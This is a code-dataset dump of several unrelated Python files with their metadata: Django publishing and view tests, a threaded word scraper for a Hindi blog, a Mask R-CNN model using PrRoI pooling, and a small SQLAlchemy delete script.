Gallery.objects.create(title=\"Gallery 001\", slug=\"gallery-001\", body=\"gallery body\")\n \n with create_revision():\n self.newstory = NewStory.objects.create(title=\"NewStory 001\", slug=\"newstory-001\", body=\"newstory body\", sub_title=\"newstory subtitle\")\n \n # the photo record is not using reversion\n self.photo = Photo.objects.create(title=\"Photo 001\", slug=\"photo-001\", body=\"photo body\")\n \n \nclass PublishingTest(PublishingBaseTest):\n \n def test_01_subclassing(self):\n \n # Ensure our subclass contains the correct options and manager attribtues\n self.assertTrue(hasattr(Article, '_publishing_meta'))\n self.assertTrue(isinstance(Article._publishing_meta, PublishingOptions))\n \n self.assertTrue(hasattr(Article, 'publishing'))\n self.assertTrue(isinstance(Article.publishing, models.Manager))\n \n self.assertTrue(hasattr(Article, '_publishing_manager'))\n self.assertTrue(isinstance(Article._publishing_manager, models.Manager))\n \n def test_02_subclassing_fields(self):\n \n # Ensure our subclass contains the two required fields\n self.assertTrue(hasattr(self.article, 'publishing_is_published'))\n self.assertTrue(hasattr(self.article, 'publishing_status'))\n \n # Make sure the publishing meta knowns there is not expiration data and \n # the model did not receive the field.\n self.assertFalse(self.article._publishing_meta.has_expired)\n self.assertFalse(hasattr(self.article, 'publishing_expiration_date'))\n \n def test_03_subclassing_created_fields(self):\n # The story model registered with publishing with no existing date \n # fields so we need to make sure they were created with the custom \n # values it supplied\n self.assertTrue(hasattr(self.story, 'published_date'))\n self.assertFalse(hasattr(self.story, 'publishing_publication_date'))\n \n field = self.story._meta.get_field('published_date')\n # Make sure the verbose name and help text were also set correctly\n self.assertEqual(field.verbose_name, \"Pub Date\")\n self.assertEqual(field.help_text, \"Use this field to publish stories!\")\n \n def test_04_non_subclassing(self):\n \n # If a register method was used instead of subclassing Publishing \n # the same bits should be available.\n self.assertTrue(hasattr(Gallery, '_publishing_meta'))\n self.assertTrue(hasattr(Gallery, 'publishing'))\n \n self.assertTrue(hasattr(self.gallery, 'publishing_is_published'))\n self.assertTrue(hasattr(self.gallery, 'publishing_status'))\n \n # Ensure gallery has the publishing methods as well\n self.assertTrue(hasattr(self.gallery, 'versions'))\n self.assertTrue(hasattr(self.gallery, 'last_version'))\n self.assertTrue(hasattr(self.gallery, 'modified_versions'))\n self.assertTrue(hasattr(self.gallery, 'published_version'))\n \n def test_05_subclassing_abstract(self):\n \n # Ensure that a subclass in which one of its parents does using \n # publishing is carried over to the class. It should not contain \n # the default date fields as the parent class defines them.\n self.assertFalse(hasattr(NewStory, 'publishing_published_date'))\n self.assertFalse(hasattr(NewStory, 'publishing_expiration_date'))\n \n # Ensure that the publishing date fields are the same as the \n # parent class\n self.assertEqual(NewStory._publishing_meta.date_field, \"publish_date\")\n self.assertEqual(NewStory._publishing_meta.expired_field, \"expired_date\")\n \n # Taking this too far? YetAnotherStory subclasses an abstract model \n # AnotherStory which inherits from another abstract model Content\n # YetAnotherStory does not define any publishing options, the options \n # are taken from AnotherStory and NOT Content\n self.assertEqual(YetAnotherStory._publishing_meta.date_field, \"another_story_publish_date\")\n # Since only the options from the direct parent was taken, the \n # expired date field is the default, since AnotherStory does not \n # define it.\n self.assertEqual(YetAnotherStory._publishing_meta.expired_field, \"publishing_expiration_date\")\n \n def test_05_datefield_creation(self):\n \n # Ensure that a registered model (Gallery) with no publishing \n # options specified, did recieve the date fields\n self.assertTrue(hasattr(self.gallery, 'publishing_publication_date'))\n self.assertTrue(hasattr(self.gallery, 'publishing_expiration_date'))\n \n def test_06_manager(self):\n \n # Should return 0 articles because we have not published anything yet\n articles = Article.publishing.all()\n self.assertEqual(len(articles), 0)\n \n # Publish the article\n Article.publishing.publish(self.article)\n \n # The default queryset set now should return the 1 item we published\n articles = Article.publishing.all()\n self.assertEqual(len(articles), 1)\n \n # Ensure we cannot publish models that are not publishable. In this \n # case we are using the Article publishing manager to try and publish \n # a photo, which is wrong.\n self.assertRaises(ValueError, Article.publishing.publish, self.photo)\n \n # The gallery was not suclassed, so we need to make sure all the same \n # funcationaility is available as well\n galleries = Gallery.publishing.all()\n self.assertEqual(len(galleries), 0)\n \n def test_07_reversion(self):\n \n # Ensure that our 3 models are registered with reversion automatically\n for model in [Article, Story, Gallery]:\n self.assertTrue(model in get_registered_models())\n \n \nclass PublishingMethodTests(PublishingBaseTest):\n \n def test_01_versions(self):\n \n # Inital versions should only be one\n self.assertEqual(len(self.article.versions), 1)\n \n # Change the title, and use reversion to create a revision\n self.article.title = \"%s - Changed\" % self.article.title\n with create_revision():\n self.article.save()\n \n # Now we would receive two version\n self.assertEqual(len(self.article.versions), 2)\n \n # Ensure the gallery's versions method works\n self.assertEqual(len(self.gallery.versions), 1)\n \n \n def test_02_last_version(self):\n \n # The last version should be the initially saved version, we check \n # the title to ensure its the same\n self.assertEqual(self.article.last_version.object.title, \"Article 001\")\n \n # Change the title of the article and save a new version\n self.article.title = \"Article 001 Changed\"\n \n with create_revision():\n self.article.save()\n \n # Ensure that the last version returns the article with the new title\n self.assertEqual(self.article.last_version.object.title, \"Article 001 Changed\")\n \n # Ensure the gallery's method works\n self.assertEqual(self.gallery.last_version.object.title, \"Gallery 001\")\n \n def test_03_modified_versions(self):\n \n # The initial version is not considered \"modified\"\n self.assertEqual(len(self.article.modified_versions), 0)\n\n self.article.title = \"Article 001 Changed\"\n \n with create_revision():\n self.article.save()\n \n # Ensure we now have one modified version of the article\n self.assertEqual(len(self.article.modified_versions), 1)\n \n # Ensure the gallery's method works\n self.assertEqual(len(self.gallery.modified_versions), 0)\n \n def test_04_published_version(self):\n # Should not be any published versions yet\n self.assertEqual(self.article.published_version, None)\n \n with create_revision():\n Article.publishing.publish(self.article)\n \n # Should be one published versions now\n self.assertEqual(self.article.published_version, self.article)\n \n # Lets make another version but set it to draft\n self.article.title = \"%s - Changed\" % self.article.title\n # Setting the status to draft is nessesary here because we \n # want to ensure we receive the correct published version\n self.article.publishing_status = DRAFT_STATUS\n \n with create_revision():\n self.article.save()\n \n # This test will ensure that our title change is not part of the \n # published version of the article.\n self.assertEqual(self.article.published_version.title, \"Article 001\")\n \n # Ensure the gallery's method works\n self.assertEqual(self.gallery.published_version, None)\n \n with create_revision():\n Gallery.publishing.publish(self.gallery)\n\n # Should be one published versions now\n self.assertEqual(self.gallery.published_version, self.gallery)\n\nclass PublishingInfoTests(PublishingBaseTest):\n \n def test_01_meta_info(self):\n # Ensure each test content object contains one meta info record\n last_article_version = self.article.last_version\n last_story_version = self.story.last_version\n last_gallery_version = self.gallery.last_version\n\n article_info_count = last_article_version.revision.revisionpublishinginfo_set.all().count()\n story_info_count = last_story_version.revision.revisionpublishinginfo_set.all().count()\n gallery_info_count = last_gallery_version.revision.revisionpublishinginfo_set.all().count()\n \n self.assertEqual(article_info_count, 1)\n self.assertEqual(story_info_count, 1)\n self.assertEqual(gallery_info_count, 1)\n \n def test_02_extra_info(self):\n \n self.article.title = \"Article 001 Changed\"\n \n with create_revision():\n self.article.save()\n \n # Should now be 2 versions of articles\n info_count = self.article.versions.count()\n self.assertEqual(info_count, 2)\n \n # Ensure that the gallery works the same\n info_count = self.gallery.versions.count()\n self.assertEqual(info_count, 1)\n \n self.gallery.title = \"Gallery 001 Changed\"\n \n with create_revision():\n self.gallery.save()\n \n info_count = self.gallery.versions.count()\n self.assertEqual(info_count, 2)\n \n \nclass PublishingAdminTests(PublishingBaseTest):\n \n fixtures = ['test_users.json']\n urls = \"publishing.test_urls\"\n \n def setUp(self):\n super(PublishingAdminTests, self).setUp()\n self.client = Client()\n \n def test_01_publishing_admin(self):\n \n # Ensure the gallery was supplied with the correct subclass\n gallery_admin = admin.site._registry[Gallery].__class__\n # Ensure the registered gallery did get the subclass PublishingAdmin\n self.assertTrue(issubclass(gallery_admin, PublishingAdmin))\n \n def test_02_admin_urls(self):\n \n self.client.login(username='user', password='pass')\n \n # Ensure the subclassed models are in the admin\n response = self.client.get('/admin/publishing/article/')\n self.assertEqual(response.status_code, 200)\n \n # Ensure the non-subclassed models have an admin also\n response = self.client.get('/admin/publishing/gallery/')\n self.assertEqual(response.status_code, 200)\n \n def test_03_admin_publishing(self):\n \n from django.contrib.formtools.tests import DummyRequest\n request = DummyRequest(POST={'_publishing_publish': ''})\n \n # Get the article admin\n article_admin = admin.site._registry[Article]\n \n self.assertEqual(self.article.published_version, None)\n # Call the save model, which should trigger the publishing of the article.\n with create_revision():\n article_admin.save_model(request, self.article, None, None)\n self.assertEqual(self.article.published_version, self.article)\n \n # Do the same thing with the gallery model\n gallery_admin = admin.site._registry[Gallery]\n \n self.assertEqual(self.gallery.published_version, None)\n with create_revision():\n gallery_admin.save_model(request, self.gallery, None, None)\n self.assertEqual(self.gallery.published_version, self.gallery)\n \n # Do the same thing with the story model\n story_admin = admin.site._registry[Story]\n \n self.assertEqual(self.story.published_version, None)\n with create_revision():\n story_admin.save_model(request, self.story, None, None)\n self.assertEqual(self.story.published_version, self.story)\n \n ", "sub_path": "publisher/tests.py", "file_name": "tests.py", "file_ext": "py", "file_size_in_byte": 17480, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "models.Publishing", "line_number": 17, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 21, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 21, "usage_type": "name"}, {"api_name": "django.db.models.SlugField", "line_number": 22, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 22, "usage_type": "name"}, {"api_name": "django.db.models.TextField", "line_number": 23, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 23, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 25, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 25, "usage_type": "name"}, {"api_name": "datetime.datetime", "line_number": 25, "usage_type": "attribute"}, {"api_name": "django.db.models.DateTimeField", "line_number": 26, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 26, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 27, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 27, "usage_type": "name"}, {"api_name": "datetime.datetime", "line_number": 27, "usage_type": "attribute"}, {"api_name": "admin.PublishingAdmin", "line_number": 36, "usage_type": "name"}, {"api_name": "django.contrib.admin.site.register", "line_number": 38, "usage_type": "call"}, {"api_name": "django.contrib.admin.site", "line_number": 38, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 38, "usage_type": "name"}, {"api_name": "models.Publishing", "line_number": 40, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 44, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 44, "usage_type": "name"}, {"api_name": "django.db.models.SlugField", "line_number": 45, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 45, "usage_type": "name"}, {"api_name": "django.db.models.TextField", "line_number": 46, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 46, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 48, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 48, "usage_type": "name"}, {"api_name": "datetime.datetime", "line_number": 48, "usage_type": "attribute"}, {"api_name": "django.db.models.DateTimeField", "line_number": 49, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 49, "usage_type": "name"}, {"api_name": "admin.PublishingAdmin", "line_number": 59, "usage_type": "name"}, {"api_name": "django.contrib.admin.site.register", "line_number": 61, "usage_type": "call"}, {"api_name": "django.contrib.admin.site", "line_number": 61, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 61, "usage_type": "name"}, {"api_name": "django.db.models.Model", "line_number": 64, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 64, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 69, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 69, "usage_type": "name"}, {"api_name": "django.db.models.SlugField", "line_number": 70, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 70, "usage_type": "name"}, {"api_name": "django.db.models.TextField", "line_number": 71, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 71, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 73, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 73, "usage_type": "name"}, {"api_name": "datetime.datetime", "line_number": 73, "usage_type": "attribute"}, {"api_name": "django.db.models.DateTimeField", "line_number": 74, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 74, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 75, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 75, "usage_type": "name"}, {"api_name": "datetime.datetime", "line_number": 75, "usage_type": "attribute"}, {"api_name": "django.contrib.admin.site.register", "line_number": 80, "usage_type": "call"}, {"api_name": "django.contrib.admin.site", "line_number": 80, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 80, "usage_type": "name"}, {"api_name": "publishing.register", "line_number": 81, "usage_type": "call"}, {"api_name": "django.db.models.Model", "line_number": 83, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 83, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 87, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 87, "usage_type": "name"}, {"api_name": "django.db.models.SlugField", "line_number": 88, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 88, "usage_type": "name"}, {"api_name": "django.db.models.TextField", "line_number": 89, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 89, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 91, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 91, "usage_type": "name"}, {"api_name": "datetime.datetime", "line_number": 91, "usage_type": "attribute"}, {"api_name": "django.db.models.DateTimeField", "line_number": 92, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 92, "usage_type": "name"}, {"api_name": "models.Publishing", "line_number": 95, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 96, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 96, "usage_type": "name"}, {"api_name": "django.db.models.SlugField", "line_number": 97, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 97, "usage_type": "name"}, {"api_name": "django.db.models.TextField", "line_number": 98, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 98, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 100, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 100, "usage_type": "name"}, {"api_name": "datetime.datetime", "line_number": 100, "usage_type": "attribute"}, {"api_name": "django.db.models.DateTimeField", "line_number": 101, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 101, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 102, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 102, "usage_type": "name"}, {"api_name": "datetime.datetime", "line_number": 102, "usage_type": "attribute"}, {"api_name": "django.db.models.DateTimeField", "line_number": 103, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 103, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 114, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 114, "usage_type": "name"}, {"api_name": "django.test.TestCase", "line_number": 130, "usage_type": "name"}, {"api_name": "reversion.create_revision", "line_number": 141, "usage_type": "call"}, {"api_name": "reversion.create_revision", "line_number": 144, "usage_type": "call"}, {"api_name": "reversion.create_revision", "line_number": 147, "usage_type": "call"}, {"api_name": "reversion.create_revision", "line_number": 150, "usage_type": "call"}, {"api_name": "options.PublishingOptions", "line_number": 163, "usage_type": "argument"}, {"api_name": "django.db.models.Manager", "line_number": 166, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 166, "usage_type": "name"}, {"api_name": "django.db.models.Manager", "line_number": 169, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 169, "usage_type": "name"}, {"api_name": "reversion.get_registered_models", "line_number": 267, "usage_type": "call"}, {"api_name": "reversion.create_revision", "line_number": 279, "usage_type": "call"}, {"api_name": "reversion.create_revision", "line_number": 298, "usage_type": "call"}, {"api_name": "reversion.create_revision", "line_number": 314, "usage_type": "call"}, {"api_name": "reversion.create_revision", "line_number": 327, "usage_type": "call"}, {"api_name": "models.DRAFT_STATUS", "line_number": 337, "usage_type": "name"}, {"api_name": "reversion.create_revision", "line_number": 339, "usage_type": "call"}, {"api_name": "reversion.create_revision", "line_number": 349, "usage_type": "call"}, {"api_name": "reversion.create_revision", "line_number": 375, "usage_type": "call"}, {"api_name": "reversion.create_revision", "line_number": 388, "usage_type": "call"}, {"api_name": "django.test.client.Client", "line_number": 402, "usage_type": "call"}, {"api_name": "django.contrib.admin.site", "line_number": 407, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 407, "usage_type": "name"}, {"api_name": "admin.PublishingAdmin", "line_number": 409, "usage_type": "argument"}, {"api_name": "django.contrib.formtools.tests.DummyRequest", "line_number": 426, "usage_type": "call"}, {"api_name": "django.contrib.admin.site", "line_number": 429, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 429, "usage_type": "name"}, {"api_name": "reversion.create_revision", "line_number": 433, "usage_type": "call"}, {"api_name": "django.contrib.admin.site", "line_number": 438, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 438, "usage_type": "name"}, {"api_name": "reversion.create_revision", "line_number": 441, "usage_type": "call"}, {"api_name": "django.contrib.admin.site", "line_number": 446, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 446, "usage_type": "name"}, {"api_name": "reversion.create_revision", "line_number": 449, "usage_type": "call"}]} +{"seq_id": "275392417", "text": "from django.urls import reverse\nfrom django.test import Client, TestCase\n\n\nclass TestViews(TestCase):\n \"\"\"\n Testing http code (200) and template chosen for each view.\n \"\"\"\n def setUp(self):\n self.client = Client()\n\n def test_general_sites_view(self):\n \"\"\"\n Testing the general view of websites\n \"\"\"\n url = reverse(\"general-sites\")\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response,\n \"websites_monitoring/sites.html\")\n\n def test_summary_average(self):\n \"\"\"\n Testing the average summary view\n \"\"\"\n url = reverse(\"summary-average\")\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response,\n \"websites_monitoring/summary-average.html\")\n\n def test_summary_sum(self):\n \"\"\"\n Testing the sum summary view\n \"\"\"\n url = reverse(\"summary-sum\")\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, \n \"websites_monitoring/summary.html\")\n", "sub_path": "application_task/websites_monitoring/tests.py", "file_name": "tests.py", "file_ext": "py", "file_size_in_byte": 1268, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "django.test.TestCase", "line_number": 5, "usage_type": "name"}, {"api_name": "django.test.Client", "line_number": 10, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 16, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 26, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 36, "usage_type": "call"}]} +{"seq_id": "114683690", "text": "import requests\nimport re\nimport threading\nfrom bs4 import BeautifulSoup\n\n\nseed_link = \"https://www.hindimehelp.com/\"\nwords_array = set()\n\n\ndef check_word_array(word_arr):\n\tglobal words_array\n\ttemp_array = []\n\tfor item in words_array :\n\t\tif re.match('^[a-zA-z]+$', item) :\n\t\t\ttemp_array.append(item)\n\t\telse :\n\t\t\tpass\n\twords_array = temp_array\n\n\n\ndef save_in_file(word_arr):\n with open(\"hindimehelp_words.txt\", \"a\") as f :\n for word in word_arr :\n \t# print(\"????/?? \" + word)\n \tf.write(word + \"\\n\")\n\ndef scrape_article_page(url):\n\tprint(\"------- article page \" + url) \n\tpage = requests.get(url)\n\tpage.encoding= 'utf-8'\n\tsoup = BeautifulSoup(page.text, 'html.parser')\n\tx = soup.select(\"div[class='td-post-content']\")\n\tfor each in x :\n\t\ttext = each.get_text().replace(\"\\n\", \" \")\n\t\tword_arr = set(re.split('\\W+', text))\n\n\t\ttemp_array = []\n\t\tfor item in word_arr :\n\t\t\tif re.match('^[a-zA-z]+$', item) :\n\t\t\t\ttemp_array.append(item)\n\t\t\telse :\n\t\t\t\tpass\n\t\tword_arr = temp_array\n\t\tsave_in_file(word_arr)\n\n\ndef scrape_list_page(url):\n page = requests.get(url)\n page.encoding= 'utf-8'\n soup = BeautifulSoup(page.text, 'html.parser')\n\n x = soup.select(\"h3[class='entry-title td-module-title'] a \")\n detail_page = []\n for each in x :\n detail_page.append(each.get(\"href\"))\n\n threadList = []; \n for article in detail_page :\n t = threading.Thread(target=scrape_article_page, args=(article,));\n t.start();\n threadList.append(t);\n\n for thread in threadList:\n \tthread.join(); \n\ncount = 47\nfor i in range(47):\n\tif i == 0 :\n\t\tlink = seed_link\n\telse :\n\t\tlink = seed_link + \"page/\" + str(i)\n\tscrape_list_page(link)\n", "sub_path": "scrape/hindimehelp.py", "file_name": "hindimehelp.py", "file_ext": "py", "file_size_in_byte": 1676, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "re.match", "line_number": 15, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 31, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 33, "usage_type": "call"}, {"api_name": "re.split", "line_number": 37, "usage_type": "call"}, {"api_name": "re.match", "line_number": 41, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 50, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 52, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 61, "usage_type": "call"}]} +{"seq_id": "482339552", "text": "from types import MethodType\n\nimport torch\nfrom torch import nn\nfrom torchvision import models\nfrom torchvision import transforms\nfrom torchvision.ops.poolers import MultiScaleRoIAlign\n\nfrom prroi_pool.functional import prroi_pool2d, _import_prroi_pooling\n\n_import_prroi_pooling()\n\nclass MultiScalePrRoIAlign(MultiScaleRoIAlign):\n def forward(self, x, boxes, image_shapes):\n \"\"\"\n Arguments:\n x (OrderedDict[Tensor]): feature maps for each level. They are assumed to have\n all the same number of channels, but they can have different sizes.\n boxes (List[Tensor[N, 4]]): boxes to be used to perform the pooling operation, in\n (x1, y1, x2, y2) format and in the image reference size, not the feature map\n reference.\n image_shapes (List[Tuple[height, width]]): the sizes of each image before they\n have been fed to a CNN to obtain feature maps. This allows us to infer the\n scale factor for each one of the levels to be pooled.\n Returns:\n result (Tensor)\n \"\"\"\n x = [v for k, v in x.items() if k in self.featmap_names]\n num_levels = len(x)\n rois = self.convert_to_roi_format(boxes)\n if self.scales is None:\n self.setup_scales(x, image_shapes)\n\n if num_levels == 1:\n return prroi_pool2d(\n x[0], rois,\n self.output_size[0],\n self.output_size[1],\n self.scales[0],\n # sampling_ratio=self.sampling_ratio\n )\n\n levels = self.map_levels(boxes)\n\n num_rois = len(rois)\n num_channels = x[0].shape[1]\n\n dtype, device = x[0].dtype, x[0].device\n result = torch.zeros(\n (num_rois, num_channels,) + self.output_size,\n dtype=dtype,\n device=device,\n )\n\n for level, (per_level_feature, scale) in enumerate(zip(x, self.scales)):\n idx_in_level = torch.nonzero(levels == level).squeeze(1)\n rois_per_level = rois[idx_in_level]\n\n result[idx_in_level] = prroi_pool2d(\n per_level_feature, rois_per_level,\n self.output_size[0],\n self.output_size[1],\n scale,\n # sampling_ratio=self.sampling_ratio\n )\n\n return result\n\ndef permute_and_flatten(layer, N, A, C, H, W):\n layer = layer.view(N, -1, C, H, W)\n layer = layer.permute(0, 3, 4, 1, 2)\n layer = layer.reshape(N, -1, C)\n return layer\n\ndef concat_box_prediction_layers(box_cls, box_regression):\n box_cls_flattened = []\n box_regression_flattened = []\n # for each feature level, permute the outputs to make them be in the\n # same format as the labels. Note that the labels are computed for\n # all feature levels concatenated, so we keep the same representation\n # for the objectness and the box_regression\n for box_cls_per_level, box_regression_per_level in zip(\n box_cls, box_regression\n ):\n N, AxC, H, W = box_cls_per_level.shape\n Ax4 = box_regression_per_level.shape[1]\n A = Ax4 // 4\n C = AxC // A\n box_cls_per_level = permute_and_flatten(\n box_cls_per_level, N, A, C, H, W\n )\n box_cls_flattened.append(box_cls_per_level)\n\n box_regression_per_level = permute_and_flatten(\n box_regression_per_level, N, A, 4, H, W\n )\n box_regression_flattened.append(box_regression_per_level)\n # concatenate on the first dimension (representing the feature levels), to\n # take into account the way the labels were generated (with all feature maps\n # being concatenated as well)\n box_cls = torch.cat(box_cls_flattened, dim=1).reshape(-1, C)\n box_regression = torch.cat(box_regression_flattened, dim=1).reshape(-1, 4)\n return box_cls, box_regression\n\n\ndef rpn_forward(self, images, features, targets=None, p=0.1):\n features = [nn.functional.dropout(f, p, self.training) for f in features.values()] # Agregar dropout aqui\n\n objectness, pred_bbox_deltas = self.head(features)\n anchors = self.anchor_generator(images, features)\n\n num_images = len(anchors)\n num_anchors_per_level = [o[0].numel() for o in objectness]\n objectness, pred_bbox_deltas = \\\n concat_box_prediction_layers(objectness, pred_bbox_deltas)\n # apply pred_bbox_deltas to anchors to obtain the decoded proposals\n # note that we detach the deltas because Faster R-CNN do not backprop through\n # the proposals\n proposals = self.box_coder.decode(pred_bbox_deltas, anchors)\n proposals = proposals.view(num_images, -1, 4)\n boxes, scores = self.filter_proposals(proposals, objectness, images.image_sizes, num_anchors_per_level)\n\n losses = {}\n # if self.training:\n # labels, matched_gt_boxes = self.assign_targets_to_anchors(anchors, targets)\n # regression_targets = self.box_coder.encode(matched_gt_boxes, anchors)\n # loss_objectness, loss_rpn_box_reg = self.compute_loss(\n # objectness, pred_bbox_deltas, labels, regression_targets)\n # losses = {\n # \"loss_objectness\": loss_objectness,\n # \"loss_rpn_box_reg\": loss_rpn_box_reg,\n # }\n return boxes, losses\n\ndef make_prroi_mask_rcnn(pretrained=True, pretrained_backbone=True, featmap_names=[0, 1, 2, 3], box_output_size=7, mask_output_size=14, **kwargs):\n box_roi_pool = MultiScalePrRoIAlign(\n featmap_names=featmap_names,\n output_size=box_output_size,\n sampling_ratio=None,\n )\n\n mask_roi_pool = MultiScalePrRoIAlign(\n featmap_names=featmap_names,\n output_size=mask_output_size,\n sampling_ratio=None,\n )\n\n model = models.detection.maskrcnn_resnet50_fpn(\n pretrained=pretrained, pretrained_backbone=pretrained_backbone,\n # rpn_nms_thresh=0,\n # rpn_pre_nms_top_n_test=3000,\n # box_score_thresh=0,\n # box_detections_per_img=200,\n # box_nms_thresh=0.2,\n box_roi_pool=box_roi_pool,\n mask_roi_pool=mask_roi_pool,\n **kwargs,\n )\n for param in model.backbone.body.parameters():\n param.requires_grad = False\n model.rpn.forward = MethodType(rpn_forward, model.rpn)\n\n return model\n\nif __name__ == '__main__':\n model = make_prroi_mask_rcnn()\n print(model)\n", "sub_path": "code/segmentation.py", "file_name": "segmentation.py", "file_ext": "py", "file_size_in_byte": 6357, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "prroi_pool.functional._import_prroi_pooling", "line_number": 11, "usage_type": "call"}, {"api_name": "torchvision.ops.poolers.MultiScaleRoIAlign", "line_number": 13, "usage_type": "name"}, {"api_name": "prroi_pool.functional.prroi_pool2d", "line_number": 35, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 49, "usage_type": "call"}, {"api_name": "torch.nonzero", "line_number": 56, "usage_type": "call"}, {"api_name": "prroi_pool.functional.prroi_pool2d", "line_number": 59, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 101, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 102, "usage_type": "call"}, {"api_name": "torch.nn.functional.dropout", "line_number": 107, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 107, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 107, "usage_type": "name"}, {"api_name": "torchvision.models.detection.maskrcnn_resnet50_fpn", "line_number": 148, "usage_type": "call"}, {"api_name": "torchvision.models.detection", "line_number": 148, "usage_type": "attribute"}, {"api_name": "torchvision.models", "line_number": 148, "usage_type": "name"}, {"api_name": "types.MethodType", "line_number": 161, "usage_type": "call"}]} +{"seq_id": "216811107", "text": "\n'''\nTo delete an item from our database we must follow the following steps:\n\nFind the entry\nSession.delete(Entry)\nSession.commit()\n'''\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom db_setup import Base, MenuItem, Restaurant\n\n\nengine = create_engine(\"sqlite:///restaurantmenu.db\")\nBase.metadata.bind = engine\nDBSession = sessionmaker(bind=engine)\nsession = DBSession()\n\n\nspinach = session.query(MenuItem).filter_by(name=\"Spinach Ice Cream\").one()\nsession.delete(spinach)\nsession.commit()", "sub_path": "delete_db.py", "file_name": "delete_db.py", "file_ext": "py", "file_size_in_byte": 523, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "sqlalchemy.create_engine", "line_number": 14, "usage_type": "call"}, {"api_name": "db_setup.Base.metadata", "line_number": 15, "usage_type": "attribute"}, {"api_name": "db_setup.Base", "line_number": 15, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.sessionmaker", "line_number": 16, "usage_type": "call"}, {"api_name": "db_setup.MenuItem", "line_number": 20, "usage_type": "argument"}]} +{"seq_id": "222611155", "text": "import os\nimport sys\nfrom pathlib import Path\n\nimport supervisely_lib as sly\nimport dotenv\n\ndotenv.load_dotenv('./debug.env')\ndotenv.load_dotenv('./secret_debug.env')\n\n\nlogger = sly.logger\n\nmy_app = sly.AppService()\napi = my_app.public_api\n\n\nmodel = None\n\ntask_id = my_app.task_id\nteam_id = 